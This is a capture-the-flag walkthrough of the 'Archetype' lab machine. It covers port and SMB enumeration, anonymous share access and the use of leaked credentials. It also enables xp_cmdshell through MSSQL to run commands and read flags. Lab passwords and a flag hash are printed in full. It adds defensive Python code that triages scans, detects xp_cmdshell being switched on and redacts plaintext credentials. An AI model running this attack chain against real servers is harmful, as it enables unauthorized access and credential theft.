Archetype
Port recognition with nmap
or you can use the recon wrapper, which runs the nmap scan and SMB enumeration in one pass
┌──(root@ghost)-[/home/ghost]
└─# recon archetype.htb
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Whoops Team Views CVE-2022-23242 WildZarek
[OS] Windows (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-22 08:44 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:44
Completed NSE at 08:44, 0.00s elapsed
Initiating Ping Scan at 08:44
Scanning archetype.htb (10.129.141.247) [4 ports]
Completed Ping Scan at 08:44, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:44
Scanning archetype.htb (10.129.141.247) [65535 ports]
Discovered open port 135/tcp on 10.129.141.247
Discovered open port 139/tcp on 10.129.141.247
Discovered open port 445/tcp on 10.129.141.247
Discovered open port 49669/tcp on 10.129.141.247
Discovered open port 5985/tcp on 10.129.141.247
Discovered open port 49668/tcp on 10.129.141.247
Discovered open port 47001/tcp on 10.129.141.247
Discovered open port 49664/tcp on 10.129.141.247
Discovered open port 49667/tcp on 10.129.141.247
Discovered open port 1433/tcp on 10.129.141.247
Discovered open port 49666/tcp on 10.129.141.247
Discovered open port 49665/tcp on 10.129.141.247
Completed SYN Stealth Scan at 08:44, 16.06s elapsed (65535 total ports)
NSE: Script scanning 10.129.141.247.
Initiating NSE at 08:44
Completed NSE at 08:44, 0.00s elapsed
Nmap scan report for archetype.htb (10.129.141.247)
Host is up (0.075s latency).
Not shown: 63937 closed tcp ports (reset), 1586 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
NSE: Script Post-scanning.
Initiating NSE at 08:44
Completed NSE at 08:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.35 seconds
Raw packets sent: 79451 (3.496MB) | Rcvd: 68543 (2.742MB)
[+] [smb]
SMB archetype.htb 445 ARCHETYPE [*] Windows Server 2019 Standard 17763 x64 (name:ARCHETYPE) (domain:Archetype) (signing:False) (SMBv1:True)
[+] IP: archetype.htb:445 Name: unknown
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[~] [smb knocker]
[ADMIN$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[backups]
Current directory is \\archetype.htb\backups\
. D 0 Mon Jan 20 07:20:57 2020
.. D 0 Mon Jan 20 07:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020
5056511 blocks of size 4096. 2610907 blocks available
[C$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[IPC$]
Current directory is \\archetype.htb\IPC$\
NT_STATUS_INVALID_INFO_CLASS listing \*
recon reports twelve open ports and also dumps SMB information: the backups share is readable without credentials and contains prod.dtsConfig
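The scan above is the kind of output a defender triages as well: which of the twelve ports should not be reachable, and what the SMB banner says about signing and SMBv1. The following parser is an added example, not part of this write-up or of the recon tool; the sample lines are constructed in the shape of the nmap table and SMB line shown above, and the review policy in REVIEW_PORTS is an assumption to adapt to the environment.

```python
"""Triage an nmap/recon text dump for exposures worth a defender's attention.

Added example, not code from the write-up or the recon tool. SAMPLE_SCAN is
constructed from lines in the same shape as the scan output above.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: open-port lines plus the SMB capability line.
SAMPLE_SCAN = """\
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
SMB archetype.htb 445 ARCHETYPE [*] Windows Server 2019 Standard 17763 x64 (name:ARCHETYPE) (domain:Archetype) (signing:False) (SMBv1:True)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
SMB_FLAG = re.compile(r"\((signing|SMBv1):(True|False)\)")

# Assumption: the reviewer's own exposure policy; adjust per environment.
REVIEW_PORTS = {
    445: "SMB reachable: restrict to management networks and require signing",
    1433: "MSSQL reachable: should not be exposed beyond the application tier",
    5985: "WinRM over HTTP reachable: restrict source ranges, prefer 5986/TLS",
}


@dataclass
class Triage:
    open_ports: dict = field(default_factory=dict)  # port -> service name
    findings: list = field(default_factory=list)


def triage_scan(text: str) -> Triage:
    """Parse open-port lines and SMB capability flags; return findings."""
    result = Triage()
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, _, svc = m.groups()
            port = int(port)
            result.open_ports[port] = svc
            if port in REVIEW_PORTS:
                result.findings.append(f"{port}/tcp {svc}: {REVIEW_PORTS[port]}")
            continue
        if line.startswith("SMB "):
            flags = dict(SMB_FLAG.findall(line))
            if flags.get("signing") == "False":
                result.findings.append(
                    "SMB signing not required: relay-resistant setting is signing:True")
            if flags.get("SMBv1") == "True":
                result.findings.append(
                    "SMBv1 enabled: legacy dialect, disable unless a dependency is documented")
    return result


if __name__ == "__main__":
    t = triage_scan(SAMPLE_SCAN)
    print(f"{len(t.open_ports)} open ports")
    for f in t.findings:
        print(" -", f)
```

Run it against a saved nmap or recon transcript; the high-numbered RPC ports stay in open_ports for the record but produce no finding, while the SMB line alone yields two findings regardless of which ports are open.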
┌──(root@ghost)-[/home/ghost]
└─# smbclient -N \\\\archetype.htb\\backups
Try "help" to get a list of possible commands.
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
smb: \> exit
┌──(root@ghost)-[/home/ghost]
└─# cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
The connection string gives us valid credentials for the MSSQL service (ARCHETYPE\sql_svc)
┌──(root@ghost)-[/home/ghost]
└─# /usr/bin/impacket-mssqlclient ARCHETYPE/sql_svc:M3g4c0rp123@archetype.htb -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell dir C:\Users
output
--------------------------------------------------------------------------------
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
NULL
Directory of C:\Users
NULL
01/19/2020 04:10 PM <DIR> .
01/19/2020 04:10 PM <DIR> ..
01/19/2020 11:39 PM <DIR> Administrator
01/19/2020 11:39 PM <DIR> Public
01/20/2020 06:01 AM <DIR> sql_svc
0 File(s) 0 bytes
5 Dir(s) 10,721,202,176 bytes free
NULL
SQL> xp_cmdshell type C:\Users\sql_svc\Desktop\user.txt
output
--------------------------------------------------------------------------------
3e7b102e78218e935bf3f4951fec21a3
SQL>
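The two "Configuration option ... changed from 0 to 1" messages that mssqlclient echoes when enable_xp_cmdshell runs are server-side messages, and SQL Server writes the same text to its ERRORLOG, which makes the enable step a cheap detection. The detector below is an added example, not code from this write-up; the log lines are constructed in ERRORLOG style (timestamp, spid, message) around the exact messages shown above, and the 60-second pairing window is an assumption.

```python
"""Detect xp_cmdshell being switched on from SQL Server ERRORLOG-style lines.

Added example for this write-up, not code from the page. SAMPLE_ERRORLOG is
constructed; it reuses the configuration-change messages seen in the
mssqlclient session, prefixed in ERRORLOG style (timestamp, spid).
"""
import re
from datetime import datetime, timedelta

SAMPLE_ERRORLOG = """\
2020-01-20 07:22:40.10 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-20 07:22:40.11 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-20 07:30:12.45 spid58      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2020-01-20 08:05:03.02 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

PAIR_WINDOW = timedelta(seconds=60)  # assumption: how close the two changes must be


def parse_config_changes(text):
    """Yield (timestamp, spid, option, old, new) for every config-change line."""
    for line in text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m["spid"], m["option"], int(m["old"]), int(m["new"])


def detect_xp_cmdshell_enable(text):
    """Return one alert per xp_cmdshell 0->1 change.

    Severity is 'high' when the same spid flipped 'show advanced options'
    shortly before (the usual enable sequence), otherwise 'medium'.
    A 1->0 change is not alerted; it is the remediation.
    """
    events = list(parse_config_changes(text))
    alerts = []
    for ts, spid, option, old, new in events:
        if option != "xp_cmdshell" or new != 1:
            continue
        paired = any(
            o == "show advanced options" and n == 1 and s == spid
            and timedelta(0) <= ts - t <= PAIR_WINDOW
            for t, s, o, _, n in events
        )
        alerts.append({
            "time": ts.isoformat(sep=" "),
            "spid": spid,
            "severity": "high" if paired else "medium",
            "message": "xp_cmdshell enabled; verify change ticket and review this session's commands",
        })
    return alerts


if __name__ == "__main__":
    for a in detect_xp_cmdshell_enable(SAMPLE_ERRORLOG):
        print(a)
```

The same messages are available through the SQL Server Audit "SERVER_OPERATION" class and the Windows Application log if ERRORLOG collection is not in place; whichever source is used, the `sp_configure` change and the `RECONFIGURE` that follows it are the event to alert on, because a legitimate administrator enabling `xp_cmdshell` should be rare enough to justify a ticket check every time.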
We have the user flag; time to elevate our privileges
SQL> xp_cmdshell powershell.exe -c (Get-PSReadlineOption).HistorySavePath
output
--------------------------------------------------------------------------------
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
NULL
SQL> xp_cmdshell type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
output
--------------------------------------------------------------------------------
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
NULL
SQL>
The PowerShell history contains the administrator password typed on a net use command line, so we have admin credentials
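Both footholds on this box come from plaintext credentials left in files: the connection string in prod.dtsConfig and the net use password in ConsoleHost_history.txt. The scanner below is an added example for both of those findings, not code from this write-up; it reports such secrets in redacted form so the report is not a second leak. The two inputs are constructed in the shape of the files shown above with placeholder account names and passwords, and the net use pattern assumes the password follows /user:, as it does on the page.

```python
"""Find plaintext credentials in an SSIS .dtsConfig file and a PSReadLine
history file, reporting them redacted.

Added example for this write-up, not the page's own code. The inputs are
constructed in the shape of the files shown above, with placeholder secrets.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample of a .dtsConfig with a password in a ConnectionString.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=EXAMPLE_PASSWORD_1;User ID=EXAMPLE\svc_account;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
"""

# Constructed sample of a PSReadLine history with a password on a command line.
SAMPLE_HISTORY = r"""Get-ChildItem C:\backups
net.exe use T: \\fileserver\backups /user:administrator EXAMPLE_PASSWORD_2
exit
"""

PASSWORD_KEYS = {"password", "pwd"}
NET_USE = re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+(?P<pw>\S+)", re.I)


def redact(secret: str) -> str:
    """Keep only the length so the finding is actionable but not a second leak."""
    return f"<redacted {len(secret)} chars>"


def scan_dtsconfig(xml_text: str, source: str = "prod.dtsConfig"):
    """Report Password=/Pwd= fields inside any ConfiguredValue of a .dtsConfig."""
    findings = []
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        pairs = {}
        for part in value_el.text.split(";"):
            if "=" in part:
                k, v = part.split("=", 1)
                pairs[k.strip().lower()] = v.strip()
        secret_key = next((k for k in pairs if k in PASSWORD_KEYS), None)
        if secret_key:
            findings.append({
                "source": source,
                "kind": "connection-string password",
                "path": conf.get("Path", ""),
                "account": pairs.get("user id", "?"),
                "secret": redact(pairs[secret_key]),
            })
    return findings


def scan_history(text: str, source: str = "ConsoleHost_history.txt"):
    """Report credentials passed on the command line in a PSReadLine history."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = NET_USE.search(line)
        if m:
            findings.append({
                "source": f"{source}:{n}",
                "kind": "net use password on command line",
                "account": m["user"],
                "secret": redact(m["pw"]),
            })
    return findings


def scan_all():
    """Run both scanners over the constructed samples."""
    return scan_dtsconfig(SAMPLE_DTSCONFIG) + scan_history(SAMPLE_HISTORY)


if __name__ == "__main__":
    for f in scan_all():
        print(f)
```

Pointing scan_dtsconfig at real package configurations on a share and scan_history at each user's PSReadLine file is a quick audit of exactly the two exposures this box relies on; the fixes are the usual ones, package credentials moved to SSIS parameters or a protected configuration, and command-line passwords replaced by prompted credentials so they never reach the history file.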